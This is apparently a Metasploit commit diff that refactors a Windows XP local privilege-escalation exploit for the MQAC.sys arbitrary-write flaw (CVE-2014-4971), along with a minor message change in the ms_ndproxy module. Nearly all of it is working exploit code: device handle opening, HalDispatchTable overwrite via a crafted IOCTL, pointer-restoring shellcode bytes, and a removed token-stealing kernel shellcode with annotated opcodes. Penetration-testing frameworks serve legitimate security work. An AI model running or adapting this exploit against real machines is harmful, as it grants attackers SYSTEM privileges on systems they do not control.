Update mqac_write to use the mixin and restore pointers

zeroSteiner · zeroSteiner · commit 9cd6353246e0 · 2014-08-04T12:15:39.000-07:00
diff --git a/modules/exploits/windows/local/mqac_write.rb b/modules/exploits/windows/local/mqac_write.rb
@@ -4,16 +4,16 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/local/windows_kernel'
 require 'rex'
 
 class Metasploit3 < Msf::Exploit::Local
   Rank = AverageRanking
 
+  include Msf::Exploit::Local::WindowsKernel
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Process
 
-  INVALID_HANDLE_VALUE = 0xFFFFFFFF
-
   def initialize(info = {})
     super(update_info(info,
       'Name'           => 'MQAC.sys Arbitrary Write Privilege Escalation',
@@ -41,6 +41,7 @@ def initialize(info = {})
         [
           ['Windows XP SP3',
            {
+             'HaliQuerySystemInfo' => 0x16bba,
              '_KPROCESS'  => "\x44",
              '_TOKEN'     => "\xc8",
              '_UPID'      => "\x84",
@@ -52,41 +53,13 @@ def initialize(info = {})
         [
           %w(CVE 2014-4971),
           %w(EDB 34112),
-          ['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt']
+          %w(URL https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt)
         ],
       'DisclosureDate' => 'Jul 22 2014',
       'DefaultTarget'  => 0
     ))
   end
 
-  def find_sys_base(drvname)
-    session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi')
-    lp_image_base = %w(PBLOB lpImageBase out)
-    cb = %w(DWORD cb in)
-    lpcb_needed = %w(PDWORD lpcbNeeded out)
-    session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL',
-                                 [lp_image_base, cb, lpcb_needed])
-    image_base = %w(LPVOID ImageBase in)
-    lp_base_name = %w(PBLOB lpBaseName out)
-    n_size = %w(DWORD nSize in)
-    session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD',
-                                 [image_base, lp_base_name, n_size])
-    results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
-    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack('L*')
-
-    addresses.each do |address|
-      results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
-      current_drvname = results['lpBaseName'][0..results['return'] - 1]
-      if drvname.nil?
-        if current_drvname.downcase.include?('krnl')
-          return [address, current_drvname]
-        end
-      elsif drvname == results['lpBaseName'][0..results['return'] - 1]
-        return [address, current_drvname]
-      end
-    end
-  end
-
   # Function borrowed from smart_hashdump
   def get_system_proc
     # Make sure you got the correct SYSTEM Account Name no matter the OS Language
@@ -106,20 +79,9 @@ def get_system_proc
     end
   end
 
-  def open_device
-    handle = session.railgun.kernel32.CreateFileA('\\\\.\\MQAC',
-      'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, nil, 'OPEN_EXISTING', 0, nil)
-    handle = handle['return']
-    if handle == 0
-      print_error('Failed to open the \\\\.\\MQAC device')
-      return nil
-    end
-    handle
-  end
-
   def check
-    handle = open_device
-    if handle.nil? || handle == INVALID_HANDLE_VALUE
+    handle = open_device('\\\\.\\MQAC', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
+    if handle.nil?
       print_error('MSMQ installation not found')
       return Exploit::CheckCode::Safe
     end
@@ -155,12 +117,9 @@ def exploit
     # results in a BSOD and so we should not let that happen.
     return unless check == Exploit::CheckCode::Appears
 
-    kernel_info = find_sys_base(nil)
     base_addr = 0xffff
-    print_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}")
-
-    handle = open_device
-    return if handle.nil? || handle == INVALID_HANDLE_VALUE
+    handle = open_device('\\\\.\\MQAC', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
+    return if handle.nil?
 
     this_proc = session.sys.process.open
     unless this_proc.memory.writable?(base_addr)
@@ -175,41 +134,29 @@ def exploit
       return
     end
 
-    hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
-    hKernel = hKernel['return']
-    halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel,
-                                                              'HalDispatchTable')
-    halDispatchTable = halDispatchTable['return']
-    halDispatchTable -= hKernel
-    halDispatchTable += kernel_info[0]
-    print_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}")
-
-    tokenstealing  = "\x52"                                                        # push edx                         # Save edx on the stack
-    tokenstealing << "\x53"                                                        # push ebx                         # Save ebx on the stack
-    tokenstealing << "\x33\xc0"                                                    # xor eax, eax                     # eax = 0
-    tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"                                # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
-    tokenstealing << "\x8b\x40" + target['_KPROCESS']                              # mov eax, dword ptr [eax+44h]     # Retrieve _KPROCESS
-    tokenstealing << "\x8b\xc8"                                                    # mov ecx, eax
-    tokenstealing << "\x8b\x98" + target['_TOKEN'] + "\x00\x00\x00"                # mov ebx, dword ptr [eax+0C8h]    # Retrieves TOKEN
-    tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00"              # mov eax, dword ptr [eax+88h]  <====| # Retrieve FLINK from ActiveProcessLinks
-    tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00"              # sub eax,88h                        | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
-    tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4         | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
-    tokenstealing << "\x75\xe8"                                                    # jne 0000101e ======================
-    tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00"                # mov edx,dword ptr [eax+0C8h]     # Retrieves TOKEN and stores on EDX
-    tokenstealing << "\x8b\xc1"                                                    # mov eax, ecx                     # Retrieves KPROCESS stored on ECX
-    tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00"                # mov dword ptr [eax+0C8h],edx     # Overwrites the TOKEN for the current KPROCESS
-    tokenstealing << "\x5b"                                                        # pop ebx                          # Restores ebx
-    tokenstealing << "\x5a"                                                        # pop edx                          # Restores edx
-    tokenstealing << "\xc2\x10"                                                    # ret 10h                          # Away from the kernel!
-
-    shellcode = make_nops(0x200) + tokenstealing
+    haldispatchtable = find_haldispatchtable
+    return if haldispatchtable.nil?
+    print_status("HalDisPatchTable Address: 0x#{haldispatchtable.to_s(16)}")
+
+    vprint_status('Getting the hal.dll base address...')
+    hal_info = find_sys_base('hal.dll')
+    fail_with(Failure::Unknown, 'Failed to disclose hal.dll base address') if hal_info.nil?
+    hal_base = hal_info[0]
+    vprint_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16).rjust(8, '0')}")
+    hali_query_system_information = hal_base + target['HaliQuerySystemInfo']
+
+    restore_ptrs =  "\x31\xc0"                                         # xor eax, eax
+    restore_ptrs << "\xb8" + [hali_query_system_information].pack('V') # mov eax, offset hal!HaliQuerySystemInformation
+    restore_ptrs << "\xa3" + [haldispatchtable + 4].pack('V')          # mov dword ptr [nt!HalDispatchTable+0x4], eax
+
+    shellcode = make_nops(0x200) + restore_ptrs + token_stealing_shellcode(target)
     this_proc.memory.write(0x1, shellcode)
     this_proc.close
 
     print_status('Triggering vulnerable IOCTL')
     session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f,
                                                 1, 0x258,
-                                                halDispatchTable + 0x4, 0)
+                                                haldispatchtable + 4, 0)
     session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
 
     unless is_system?
diff --git a/modules/exploits/windows/local/ms_ndproxy.rb b/modules/exploits/windows/local/ms_ndproxy.rb
@@ -141,19 +141,19 @@ def disclose_addresses(t)
     addresses['halDispatchTable'] = hal_dispatch_table
     vprint_good("HalDispatchTable found at 0x#{addresses['halDispatchTable'].to_s(16)}")
 
-    vprint_status('Getting the hal.dll Base Address...')
+    vprint_status('Getting the hal.dll base address...')
     hal_info = find_sys_base('hal.dll')
     if hal_info.nil?
-      vprint_error('Failed to disclose hal.dll Base Address')
+      vprint_error('Failed to disclose hal.dll base address')
       return nil
     end
     hal_base = hal_info[0]
-    vprint_good("hal.dll Base Address disclosed at 0x#{hal_base.to_s(16)}")
+    vprint_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16)}")
 
     hali_query_system_information = hal_base + t['HaliQuerySystemInfo']
     addresses['HaliQuerySystemInfo'] = hali_query_system_information
 
-    vprint_good("HaliQuerySystemInfo Address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}")
+    vprint_good("HaliQuerySystemInfo address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}")
     addresses
   end
 
